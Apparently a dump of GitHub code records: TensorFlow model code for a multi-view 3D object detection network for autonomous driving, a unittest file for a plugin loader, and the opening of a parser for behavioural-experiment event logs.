image.get_shape().as_list()[3]\n\n for i, name in enumerate(layers):\n kind = name[9:13]\n if kind == 'conv':\n if name == 'birdview_conv1_1':\n # Modify the first conv layer\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n kernels = np.concatenate((np.repeat(kernels[:, :, 0 : 1], channel / 3, axis = 2), np.repeat(kernels[: , :, 1 : 2], channel / 3, axis = 2),\n np.repeat(kernels[:, :, 2 : 3], channel - 2 * (channel / 3), axis = 2)), axis = 2)\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n # pdb.set_trace()\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif name == 'birdview_conv4_1':\n # Modify the senventh conv layer\n # pdb.set_trace()\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index = random.sample(range(512), 256)\n kernels = kernels[:, :, :, sample_index]\n bias = bias[:, sample_index]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif name == 'birdview_conv4_2':\n # Modify the eighth conv layer\n # pdb.set_trace()\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index_1 = random.sample(range(512), 256)\n sample_index_2 = random.sample(range(512), 256)\n kernels = kernels[:, :, sample_index_1, :]\n kernels = kernels[:, :, :, sample_index_2]\n bias = bias[:, sample_index_2]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif name == 'birdview_conv4_3':\n # pdb.set_trace()\n # Modify the ninth conv layer\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index_1 = random.sample(range(512), 256)\n sample_index_2 = random.sample(range(512), 256)\n kernels = kernels[:, :, sample_index_1, :]\n kernels = kernels[:, :, :, sample_index_2]\n bias = bias[:, sample_index_2]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n\n else:\n kernels, bias = weights[i][0][0][0][0]\n # matconvnet: weights are [width, height, in_channels, out_channels]\n # tensorflow: weights are [height, width, in_channels, out_channels]\n kernels = utils.get_variable(np.transpose(kernels, (1, 0, 2, 3)), name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif kind == 'relu':\n current = tf.nn.relu(current, name=name)\n if debug: \n \tutils.add_activation_summary(current)\n elif kind == 'pool':\n current = utils.avg_pool_2x2(current)\n net[name] = current\n # pdb.set_trace()\n\n return net\n\n\n# Vgg net modified for frontview input\ndef vgg_net_frontview(weights, image, debug, keep_prob):\n layers = (\n 'frontview_conv1_1', 'frontview_relu1_1', 'frontview_conv1_2', 'frontview_relu1_2', 'frontview_pool1',\n\n 'frontview_conv2_1', 'frontview_relu2_1', 'frontview_conv2_2', 'frontview_relu2_2', 'frontview_pool2',\n\n 'frontview_conv3_1', 'frontview_relu3_1', 'frontview_conv3_2', 'frontview_relu3_2', 'frontview_conv3_3',\n 'frontview_relu3_3', 'frontview_pool3',\n\n 'frontview_conv4_1', 'frontview_relu4_1', 'frontview_conv4_2', 'frontview_relu4_2', 'frontview_conv4_3',\n 'frontview_relu4_3'\n\n # 'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',\n # 'relu5_3'\n )\n\n # output of retrained layer for vgg\n net = {}\n current = image\n for i, name in enumerate(layers):\n kind = name[10:14]\n if kind == 'conv':\n if name == 'frontview_conv4_1':\n # Modify the senventh conv layer\n # pdb.set_trace()\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index = random.sample(range(512), 256)\n kernels = kernels[:, :, :, sample_index]\n bias = bias[:, sample_index]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif name == 'frontview_conv4_2':\n # Modify the eighth conv layer\n # pdb.set_trace()\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index_1 = random.sample(range(512), 256)\n sample_index_2 = random.sample(range(512), 256)\n kernels = kernels[:, :, sample_index_1, :]\n kernels = kernels[:, :, :, sample_index_2]\n bias = bias[:, sample_index_2]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif name == 'frontview_conv4_3':\n # pdb.set_trace()\n # Modify the ninth conv layer\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index_1 = random.sample(range(512), 256)\n sample_index_2 = random.sample(range(512), 256)\n kernels = kernels[:, :, sample_index_1, :]\n kernels = kernels[:, :, :, sample_index_2]\n bias = bias[:, sample_index_2]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n else:\n kernels, bias = weights[i][0][0][0][0]\n # matconvnet: weights are [width, height, in_channels, out_channels]\n # tensorflow: weights are [height, width, in_channels, out_channels]\n kernels = utils.get_variable(np.transpose(kernels, (1, 0, 2, 3)), name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif kind == 'relu':\n current = tf.nn.relu(current, name=name)\n if debug: \n utils.add_activation_summary(current)\n elif kind == 'pool':\n current = utils.avg_pool_2x2(current)\n net[name] = current\n # pdb.set_trace()\n return net\n\n\n# Vgg net modified for rgb input\ndef vgg_net_rgb(weights, image, debug, keep_prob):\n layers = (\n 'rgb_conv1_1', 'rgb_relu1_1', 'rgb_conv1_2', 'rgb_relu1_2', 'rgb_pool1',\n\n 'rgb_conv2_1', 'rgb_relu2_1', 'rgb_conv2_2', 'rgb_relu2_2', 'rgb_pool2',\n\n 'rgb_conv3_1', 'rgb_relu3_1', 'rgb_conv3_2', 'rgb_relu3_2', 'rgb_conv3_3',\n 'rgb_relu3_3', 'rgb_pool3',\n\n 'rgb_conv4_1', 'rgb_relu4_1', 'rgb_conv4_2', 'rgb_relu4_2', 'rgb_conv4_3',\n 'rgb_relu4_3'\n\n # 'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',\n # 'relu5_3'\n )\n\n # output of retrained layer for vgg\n net = {}\n current = image\n for i, name in enumerate(layers):\n kind = name[4:8]\n if kind == 'conv':\n if name == 'rgb_conv4_1':\n # Modify the senventh conv layer\n # pdb.set_trace()\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index = random.sample(range(512), 256)\n kernels = kernels[:, :, :, sample_index]\n bias = bias[:, sample_index]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif name == 'rgb_conv4_2':\n # Modify the eighth conv layer\n # pdb.set_trace()\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index_1 = random.sample(range(512), 256)\n sample_index_2 = random.sample(range(512), 256)\n kernels = kernels[:, :, sample_index_1, :]\n kernels = kernels[:, :, :, sample_index_2]\n bias = bias[:, sample_index_2]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif name == 'rgb_conv4_3':\n # pdb.set_trace()\n # Modify the ninth conv layer\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index_1 = random.sample(range(512), 256)\n sample_index_2 = random.sample(range(512), 256)\n kernels = kernels[:, :, sample_index_1, :]\n kernels = kernels[:, :, :, sample_index_2]\n bias = bias[:, sample_index_2]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n else:\n kernels, bias = weights[i][0][0][0][0]\n # matconvnet: weights are [width, height, in_channels, out_channels]\n # tensorflow: weights are [height, width, in_channels, out_channels]\n kernels = utils.get_variable(np.transpose(kernels, (1, 0, 2, 3)), name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif kind == 'relu':\n current = tf.nn.relu(current, name=name)\n if debug: \n utils.add_activation_summary(current)\n elif kind == 'pool':\n current = utils.avg_pool_2x2(current)\n net[name] = current\n # pdb.set_trace()\n\n return net\n\n# 3D proposal network\ndef Proposal_net(birdview, frontview, rgbview, model_dir, MODEL_URL, debug, keep_prob):\n #\"\"\" 3D region proposal network \"\"\"\n # input birdview, dropout probability, weight of vgg, ground-truth labels, ground-truth regression value, \n # anchor classification mask and anchor regression mask\n # The birdview has more than three channel, thus we need to train first two conv layers in vgg-16\n MODEL_URL = 'http://www.vlfeat.org/matconvnet/models/beta16/imagenet-vgg-verydeep-16.mat'\n print(\"setting up vgg initialized conv layers ...\")\n model_data = utils.get_model_data(model_dir, MODEL_URL)\n # preprocessing\n # mean = model_data['normalization'][0][0][0]\n # mean_pixel = np.mean(mean, axis=(0, 1))\n # processed_image = utils.process_image(birdview, mean_pixel)\n weights = np.squeeze(model_data['layers']) \n\n # vgg-birdview\n with tf.name_scope(\"birdview-Vgg-16\"):\n \n birdview_net = vgg_net_birdview(weights, birdview, debug, keep_prob)\n current = birdview_net[\"birdview_relu4_3\"]\n # upsample, output 256 channels\n with tf.name_scope(\"birdview_Upsample_layer\"):\n kernels = utils.weight_variable([3, 3, 256, 256], name= \"birdview_upsample_w\")\n bias = utils.bias_variable([256], name=\"birdview_upsample_b\")\n output_shape = current.get_shape().as_list()\n output_shape[1] *= 4\n output_shape[2] *= 4\n output_shape[3] = kernels.get_shape().as_list()[2]\n birdview_net['birdview_upsample'] = utils.conv2d_transpose_strided(current, kernels, bias, output_shape = output_shape, stride = 4, name = 'birdview_upsample', keep_prob = keep_prob)\n current = birdview_net['birdview_upsample']\n if debug: \n utils.add_activation_summary(current)\n\n # vgg-birdview\n with tf.name_scope(\"frontview-Vgg-16\"):\n frontview_net = vgg_net_frontview(weights, frontview, debug, keep_prob)\n current = frontview_net[\"frontview_relu4_3\"]\n # pdb.set_trace()\n # upsample, output 256 channels\n with tf.name_scope(\"frontview_Upsample_layer\"):\n kernels = utils.weight_variable([3, 3, 256, 256], name= \"frontview_upsample_w\")\n bias = utils.bias_variable([256], name=\"frontview_upsample_b\")\n output_shape = current.get_shape().as_list()\n output_shape[1] *= 4\n output_shape[2] *= 4\n output_shape[3] = kernels.get_shape().as_list()[2]\n frontview_net['frontview_upsample'] = utils.conv2d_transpose_strided(current, kernels, bias, output_shape = output_shape, stride = 4, name = 'frontview_upsample', keep_prob = keep_prob)\n current = frontview_net['frontview_upsample']\n if debug: \n utils.add_activation_summary(current)\n\n # vgg-birdview\n with tf.name_scope(\"rgb-Vgg-16\"):\n rgbview_net = vgg_net_rgb(weights, rgbview, debug, keep_prob)\n current = rgbview_net[\"rgb_relu4_3\"]\n # upsample, output 256 channels\n with tf.name_scope(\"rgb_Upsample_layer\"):\n kernels = utils.weight_variable([3, 3, 256, 256], name= \"rgb_upsample_w\")\n bias = utils.bias_variable([256], name=\"rgb_upsample_b\")\n output_shape = current.get_shape().as_list()\n output_shape[1] *= 2\n output_shape[2] *= 2\n output_shape[3] = kernels.get_shape().as_list()[2]\n rgbview_net['rgb_upsample'] = utils.conv2d_transpose_strided(current, kernels, bias, output_shape = output_shape, name = 'rgb_upsample', keep_prob = keep_prob)\n current = rgbview_net['rgb_upsample']\n if debug: \n utils.add_activation_summary(current)\n \n return birdview_net, frontview_net, rgbview_net\n\n# region pooling\n# def region_pooling(birdview_feat, frontview_feat, rgbview_feat, birdview_proposals, frontview_proposals, rgbview_proposals, batch_size, ROI_H, ROI_W):\n\ndef region_pooling(birdview_feat, frontview_feat, rgbview_feat, birdview_rois, frontview_rois, rgbview_rois, birdview_rois_ind, frontview_rois_ind, rgbview_rois_ind, ROI_H, ROI_W, debug):\n\n # dynamic region pooling\n\n birdview_channel = birdview_feat.get_shape().as_list()[3]\n frontview_channel = frontview_feat.get_shape().as_list()[3]\n rgbview_channel = rgbview_feat.get_shape().as_list()[3]\n birdview_region_list = [] \n frontview_region_list = []\n rgbview_region_list = []\n\n birdview_pooling_ROI = tf.image.crop_and_resize(birdview_feat, birdview_rois, birdview_rois_ind, [ROI_H, ROI_W], name = 'birdview_pooling_ROI')\n frontview_pooling_ROI = tf.image.crop_and_resize(frontview_feat, frontview_rois, frontview_rois_ind, [ROI_H, ROI_W], name = 'frontview_pooling_ROI')\n rgbview_pooling_ROI = tf.image.crop_and_resize(rgbview_feat, rgbview_rois, rgbview_rois_ind, [ROI_H, ROI_W], name = 'rgbview_pooling_ROI')\n \n if debug: \n utils.add_activation_summary(birdview_pooling_ROI)\n utils.add_activation_summary(frontview_pooling_ROI)\n utils.add_activation_summary(rgbview_pooling_ROI)\n \n\n return birdview_pooling_ROI, frontview_pooling_ROI, rgbview_pooling_ROI\n\n# fusion network\ndef region_fusion_net(birdview_region, frontview_region, rgbview_region, NUM_OF_REGRESSION_VALUE, ROI_H, ROI_W):\n # flat\n\n birdview_flatregion = tf.reshape(birdview_region, [-1, ROI_W * ROI_H * 256], name = 'birdview_flatregion')\n frontview_flatregion = tf.reshape(frontview_region, [-1, ROI_W * ROI_H * 256], name = 'frontview_flatregion')\n rgbview_flatregion = tf.reshape(rgbview_region, [-1, ROI_W * ROI_H * 256], name = 'rgbview_flatregion')\n\n with tf.name_scope(\"fusion-1\"):\n # first fusion\n # feature transformation is implemented by fully connected netwok\n\n joint_1 = utils.join(birdview_flatregion, frontview_flatregion, rgbview_flatregion, name = 'joint_1')\n fusion_birdview_1 = utils.fully_connected(joint_1, 1024, name = 'fusion_birdview_1') \n fusion_frontview_1 = utils.fully_connected(joint_1, 1024, name = 'fusion_frontview_1')\n fusion_rgbview_1 = utils.fully_connected(joint_1, 1024, name ='fusion_rgbview_1')\n\n with tf.name_scope(\"fusion-2\"):\n # second fusion\n joint_2 = utils.join(fusion_birdview_1, fusion_frontview_1, fusion_rgbview_1, name = 'joint_2')\n fusion_birdview_2 = utils.fully_connected(joint_2, 1024, name ='fusion_birdview_2')\n fusion_frontview_2 = utils.fully_connected(joint_2, 1024,name = 'fusion_frontview_2')\n fusion_rgbview_2 = utils.fully_connected(joint_2, 1024, name = 'fusion_rgbview_2')\n\n with tf.name_scope(\"fusion-3\"):\n # third fusion\n joint_3 = utils.join(fusion_birdview_2, fusion_frontview_2, fusion_rgbview_2, 'joint_3')\n fusion_birdview_3 = utils.fully_connected(joint_3, 1024, name ='fusion_birdview_3')\n fusion_frontview_3 = utils.fully_connected(joint_3, 1024,name = 'fusion_frontview_3')\n fusion_rgbview_3 = utils.fully_connected(joint_3, 1024,name = 'fusion_rgbview_3')\n \n\n with tf.name_scope(\"fusion-4\"):\n joint_4 = utils.join(fusion_birdview_3, fusion_frontview_3, fusion_rgbview_3, name ='joint_4')\n #pdb.set_trace()\n #joint_4= utils.join(birdview_flatregion, frontview_flatregion, rgbview_flatregion, name = 'joint_1')\n logits_cls = utils.fully_connected(joint_4, 2, name = 'fusion_cls_4', relu = False)\n logits_reg = utils.fully_connected(joint_4, NUM_OF_REGRESSION_VALUE, name = 'fusion_reg_4', relu = False)\n\n\n return logits_cls, logits_reg\n\n\n# l2 loss for regression\ndef l2_loss(s, t):\n \"\"\" L2 loss function. \"\"\"\n d = s - t\n x = d * d\n loss = tf.reduce_sum(x, 1)\n return loss\n\n# MV3D network comprised of 3D proposal network and region fusion networkj\n# def MV3D(birdview, frontview, rgbview, birdview_proposals, frontview_proposals, rgbview_proposals, proposals_mask, gt_ROI_labels, gt_ROI_regs, \n# \t birdview_rois, frontview_rois, rgbview_rois, ROI_H, ROI_W, model_dir, debug):\ndef MV3D(birdview, frontview, rgbview, cls_mask, reg_mask, gt_ROI_labels, gt_ROI_regs, \n birdview_rois, frontview_rois, rgbview_rois, birdview_box_ind, frontview_box_ind, \n rgbview_box_ind, ROI_H, ROI_W, NUM_OF_REGRESSION_VALUE, model_dir, weight, reg_weight, debug, keep_prob = 1.0):\n \n MODEL_URL = 'http://www.vlfeat.org/matconvnet/models/beta16/imagenet-vgg-verydeep-16.mat'\n \n \n with tf.name_scope(\"3D-Proposal-net\"):\n birdview_net, frontview_net, rgbview_net = Proposal_net(birdview, frontview, rgbview, model_dir, MODEL_URL, debug, keep_prob)\n # accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(all_rpn_logits, dimension=1), tf.reshape(gt_anchor_labels, [-1])), tf.float32))\n\n with tf.name_scope(\"ROI-pooling\"):\n # birdview_pooling_ROI, frontview_pooling_ROI, rgbview_pooling_ROI = region_pooling(birdview_net['birdview_relu4_3'], frontview_net['frontview_relu4_3'], rgbview_net['rgb_relu4_3'], \n # birdview_proposals, frontview_proposals, rgbview_proposals, birdview_rois, frontview_rois, \n # rgbview_rois, ROI_H, ROI_W, debug)\n birdview_pooling_ROI, frontview_pooling_ROI, rgbview_pooling_ROI = region_pooling(birdview_net['birdview_upsample'], frontview_net['frontview_upsample'], rgbview_net['rgb_upsample'], \n birdview_rois, frontview_rois, rgbview_rois, birdview_box_ind, frontview_box_ind, rgbview_box_ind, \n ROI_H, ROI_W, debug)\n # pdb.set_trace()\n with tf.name_scope(\"region-fusion-net\"):\n logits_cls, logits_reg = region_fusion_net(birdview_pooling_ROI, frontview_pooling_ROI, rgbview_pooling_ROI, NUM_OF_REGRESSION_VALUE, ROI_H, ROI_W)\n # pdb.set_trace()\n with tf.name_scope(\"loss\"):\n \n gt_ROI_regs = tf.reshape(gt_ROI_regs, [-1, NUM_OF_REGRESSION_VALUE])\n gt_ROI_labels = tf.reshape(gt_ROI_labels, [-1])\n regression_loss = tf.reduce_sum(l2_loss(logits_reg, gt_ROI_regs) * tf.cast(reg_mask, tf.float32)) / tf.cast(tf.reduce_sum(reg_mask), tf.float32)\n \n classification_loss = tf.reduce_sum(tf.nn.sparse_softmax_cross_entropy_with_logits(labels = gt_ROI_labels, logits = logits_cls) * tf.cast(cls_mask, tf.float32)) / tf.cast(tf.reduce_sum(cls_mask), tf.float32)\n # regularization\n trainable_var = tf.trainable_variables()\n weight_decay = 0\n for var in trainable_var:\n weight_decay = weight_decay + tf.nn.l2_loss(var) \n\n loss = regression_loss + weight * classification_loss + reg_weight * weight_decay\n\n return loss, classification_loss, regression_loss, logits_cls, logits_reg\n\n# Birdview proposal network (3D RPN) \ndef birdview_proposal_net(birdview, gt_anchor_labels, gt_anchor_regs, anchor_cls_masks, anchor_reg_masks, weight, reg_weight, model_dir, batch_size, debug, keep_prob = 1.0):\n #\"\"\" 3D region proposal network \"\"\"\n # input birdview, dropout probability, weight of vgg, ground-truth labels, ground-truth regression value, \n # anchor classification mask and anchor regression mask\n # The birdview has more than three channel, thus we need to train first two conv layers in vgg-16\n # Miscellaneous definition\n MODEL_URL = 'http://www.vlfeat.org/matconvnet/models/beta16/imagenet-vgg-verydeep-16.mat'\n NUM_OF_REGRESSION_VALUE = 6\n NUM_OF_ANCHOR = 4\n FCN_KERNEL_SIZE = 3\n\n print(\"setting up vgg initialized conv layers ...\")\n model_data = utils.get_model_data(model_dir, MODEL_URL)\n weights = np.squeeze(model_data['layers']) \n\n # store output from classfication layer and regression layer\n all_rpn_logits = []\n all_rpn_regs = []\n current = birdview\n\n\n # vgg\n with tf.name_scope(\"Vgg-16\"):\n net = vgg_net_birdview(weights, birdview, debug, keep_prob)\n current = net[\"birdview_relu4_3\"]\n # upsample, output 256 channels\n with tf.name_scope(\"Upsample_layer\"):\n kernels = utils.weight_variable([3, 3, 256, 256], name= \"upsample_w\")\n bias = utils.bias_variable([256], name=\"upsample_b\")\n net['upsample'] = utils.conv2d_transpose_strided(current, kernels, bias, name = 'upsample', keep_prob = keep_prob)\n current = net['upsample']\n if debug: \n utils.add_activation_summary(current)\n with tf.name_scope(\"Fully_conv_layer\"):\n # Fully convolution layer of 3D proposal network. Similar to the last layer of Region Prosal Network.\n \n for j in range(NUM_OF_ANCHOR):\n kernels_cls = utils.weight_variable([FCN_KERNEL_SIZE, FCN_KERNEL_SIZE, 256, 2], name= \"FCN_cls_w\" + str(j))\n kernels_reg = utils.weight_variable([FCN_KERNEL_SIZE, FCN_KERNEL_SIZE, 256, NUM_OF_REGRESSION_VALUE], name= \"FCN_reg_w\" + str(j))\n bias_cls = utils.bias_variable([2], name=\"FCN_cls_b\" + str(j))\n bias_reg = utils.bias_variable([6], name=\"FCN_reg_b\"+ str(j))\n rpn_logits = utils.conv2d_basic(current, kernels_cls, bias_cls)\n rpn_regs = utils.conv2d_basic(current, kernels_reg, bias_reg)\n net[\"FCN_cls_\" + str(j)] = rpn_logits\n net[\"FCN_reg_\" + str(j)] = rpn_regs\n if debug:\n utils.add_activation_summary(rpn_logits)\n\n rpn_logits = tf.reshape(rpn_logits, [batch_size, -1, 2])\n all_rpn_logits.append(rpn_logits)\n # Values required clip might be different\n # rpn_regs = tf.clip_by_value(rpn_regs, -0.2, 0.2)\n rpn_regs = tf.reshape(rpn_regs, [batch_size, -1, NUM_OF_REGRESSION_VALUE])\n all_rpn_regs.append(rpn_regs)\n \n with tf.name_scope(\"Cls_and_reg_loss\"):\n \n all_rpn_logits = tf.concat(all_rpn_logits, 1)\n all_rpn_regs = tf.concat(all_rpn_regs, 1)\n # pdb.set_trace()\n all_rpn_logits = tf.reshape(all_rpn_logits, [-1, 2])\n all_rpn_logits_softmax = tf.nn.softmax(all_rpn_logits, dim = -1)\n all_rpn_regs = tf.reshape(all_rpn_regs, [-1, NUM_OF_REGRESSION_VALUE])\n \n # Compute the loss function\n gt_anchor_labels = tf.reshape(gt_anchor_labels, [-1]) \n gt_anchor_regs = tf.reshape(gt_anchor_regs, [-1, NUM_OF_REGRESSION_VALUE])\n anchor_cls_masks = tf.reshape(anchor_cls_masks, [-1])\n anchor_reg_masks = tf.reshape(anchor_reg_masks, [-1])\n\n # Classification loss\n classification_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels = gt_anchor_labels, logits = all_rpn_logits) * anchor_cls_masks\n classification_loss = tf.reduce_sum(classification_loss) / tf.maximum(tf.reduce_sum(anchor_cls_masks), 1)\n\n #regression loss\n regression_loss = tf.reduce_sum(l2_loss(all_rpn_regs, gt_anchor_regs) * anchor_reg_masks) / tf.maximum(tf.reduce_sum(anchor_reg_masks), 1)\n\n # regularization\n trainable_var = tf.trainable_variables()\n weight_decay = 0\n for var in trainable_var:\n weight_decay = weight_decay + tf.nn.l2_loss(var)\n\n Overall_loss = weight * classification_loss + regression_loss + reg_weight * weight_decay\n\n \n return net, classification_loss, regression_loss, Overall_loss, all_rpn_logits_softmax, all_rpn_regs","repo_name":"wayne0908/Multi-View-3D-Object-Detection-Network-for-Autonomous-Driving","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":27845,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"76"} +{"seq_id":"30906582111","text":"from collections import defaultdict\nfrom unittest import TestCase\n\nfrom testfixtures import ShouldRaise, Replacer, compare\n\nfrom archivist.plugins import Plugins\n\n\nplugin1 = object()\nplugin2 = object()\nplugin3 = object()\nplugin4 = object()\n\n\nclass MockEntryPoint(object):\n def __init__(self, name, obj):\n self.name, self.obj = name, obj\n def load(self):\n return self.obj\n\n\nclass TestPluginLoading(TestCase):\n\n def mock_iter_entry_points(self, group):\n return self.entry_points[group]\n\n def setUp(self):\n self.entry_points = defaultdict(list)\n\n def load_plugins(self):\n with Replacer() as r:\n r.replace('archivist.plugins.iter_entry_points',\n self.mock_iter_entry_points)\n plugins = Plugins.load()\n return plugins\n\n def test_no_plugins(self):\n plugins = self.load_plugins()\n with ShouldRaise(KeyError('foo')):\n plugins.get('notification', 'foo')\n with ShouldRaise(KeyError('foo')):\n plugins.get('repo', 'foo')\n with ShouldRaise(KeyError('foo')):\n plugins.get('source', 'foo')\n\n def test_one_notification_plugin(self):\n self.entry_points['archivist.notification'].append(\n MockEntryPoint('foo', plugin1)\n )\n plugins = self.load_plugins()\n compare(plugin1, plugins.get('notification', 'foo'))\n with ShouldRaise(KeyError('foo')):\n plugins.get('repo', 'foo')\n with ShouldRaise(KeyError('foo')):\n plugins.get('source', 'foo')\n\n def test_one_repo_plugin(self):\n self.entry_points['archivist.repo'].append(\n MockEntryPoint('foo', plugin1)\n )\n plugins = self.load_plugins()\n with ShouldRaise(KeyError('foo')):\n plugins.get('notification', 'foo')\n compare(plugin1, plugins.get('repo', 'foo'))\n with ShouldRaise(KeyError('foo')):\n plugins.get('source', 'foo')\n\n def test_one_source_plugin(self):\n self.entry_points['archivist.source'].append(\n MockEntryPoint('foo', plugin1)\n )\n plugins = self.load_plugins()\n with ShouldRaise(KeyError('foo')):\n plugins.get('notification', 'foo')\n with ShouldRaise(KeyError('foo')):\n plugins.get('repo', 'foo')\n compare(plugin1, plugins.get('source', 'foo'))\n\n def test_multiple_plugins(self):\n self.entry_points['archivist.notification'].append(\n MockEntryPoint('foo', plugin1)\n )\n self.entry_points['archivist.notification'].append(\n MockEntryPoint('bar', plugin2)\n )\n self.entry_points['archivist.repo'].append(\n MockEntryPoint('baz', plugin3)\n )\n self.entry_points['archivist.source'].append(\n MockEntryPoint('foo', plugin4)\n )\n plugins = self.load_plugins()\n compare(plugin1, plugins.get('notification', 'foo'))\n compare(plugin2, plugins.get('notification', 'bar'))\n compare(plugin3, plugins.get('repo', 'baz'))\n compare(plugin4, plugins.get('source', 'foo'))\n\n def test_plugin_names(self):\n # check setup.py is as expected!\n plugins = Plugins.load()\n actual = []\n for type, stuff in sorted(plugins.plugins.items()):\n for name in sorted(stuff):\n actual.append((type, name))\n compare([\n ('notification', 'email'),\n ('notification', 'stream'),\n ('repo', 'git'),\n ('source', 'crontab'),\n ('source', 'jenkins'),\n ('source', 'packages'),\n ('source', 'paths'),\n ],actual)\n","repo_name":"simplistix/archivist","sub_path":"tests/test_plugins.py","file_name":"test_plugins.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"40464507261","text":"import os, sys, subprocess\nimport tempfile, logging, pickle\n\nimport scipy as sp\nimport numpy as np\nimport matplotlib.pylab as pl\n\nfrom nifti import *\nfrom pypsignifit import *\nfrom Tools.Operators.BehaviorOperator import NewBehaviorOperator, TrialEventSequence\nfrom IPython import embed as shell\nimport re\n\n\nclass WMMBehaviorOperator(NewBehaviorOperator):\n\tdef __init__(self, inputObject, **kwargs):\n\t\t\"\"\"docstring for __init__\"\"\"\n\t\tsuper(WMMBehaviorOperator, self).__init__(inputObject = inputObject, **kwargs)\n\t\twith open( self.inputFileName ) as f:\n\t\t\tfile_data = pickle.load(f)\n\t\tself.events = file_data['eventArray']\n\t\tself.parameters = file_data['parameterArray']\n\t\t\n\t\trun_start_time_string = [e for e in self.events[0] if e[:len('trial 0 phase 1')] == 'trial 0 phase 1']\n\t\tself.run_start_time = float(run_start_time_string[0].split(' ')[-1])\n\t\t\t\t\t\n\tdef phase_timings(self):\n\t\t\"\"\"\n\t\tFunction that returns array with length of nr_of_trials that contains timings (corrected for run_start_time) of all phases of the experiment. \n\n\t\tFirst with recompile, the raw timings of each phase are extracted from the event parameters.\n\t\tNext all phase_events are stored in separate lists for all trials \n\t\t\"\"\"\n\t\tself.phase_events = []\n\t\tfor j in range (len(self.events)):\n\t\t\trec_phase = re.compile('trial %d phase (\\d+) started at (-?\\d+\\.?\\d*)' % j)\n\t\t\tself.phase_events.append(filter(None,[re.findall(rec_phase,self.events[j][i]) for i in range (len(self.events[j])) if isinstance (self.events[j][i],str)]))\n\t\t\n\t\tfor a in range(len(self.phase_events)):\n\t\t\tfor b in range(len(self.phase_events[a])):\n\t\t\t\tself.phase_events[a][b] = [self.phase_events[a][b][0][0], float(self.phase_events[a][b][0][1]) - self.run_start_time]\n\t\treturn self.phase_events\t\n\t\t\n\tdef response_timings(self):\n\t\t\"\"\"\n\t\tFunction that returns array with length of nr_of_trials that contains timings (corrected for run_start_time) of all phases of the experiment. \n\t\tFunction is similar to phase timings. Note that in contrast to phase_timings, function can return lists of different lengths depending\n\t\ton whether or not a pp responded more than once on a specific trial \n\t\t\n\t\t\"\"\"\n\t\tself.response_events = []\n\t\tfor j in range (len(self.events)):\t\n\t\t\trec_button = re.compile('trial %d event ([b,y]) at (-?\\d+\\.?\\d*)' % j)\n\t\t\tself.response_events.append(filter(None,[re.findall(rec_button,self.events[j][i]) for i in range (len(self.events[j])) if isinstance (self.events[j][i],str)])) \n \n\t\tfor a in range(len(self.response_events)):\n\t\t\tfor b in range(len(self.response_events[a])):\n\t\t\t\tself.response_events[a][b] = [self.response_events[a][b][0][0], float(self.response_events[a][b][0][1]) - self.run_start_time]\n\t\t\n\t\treturn 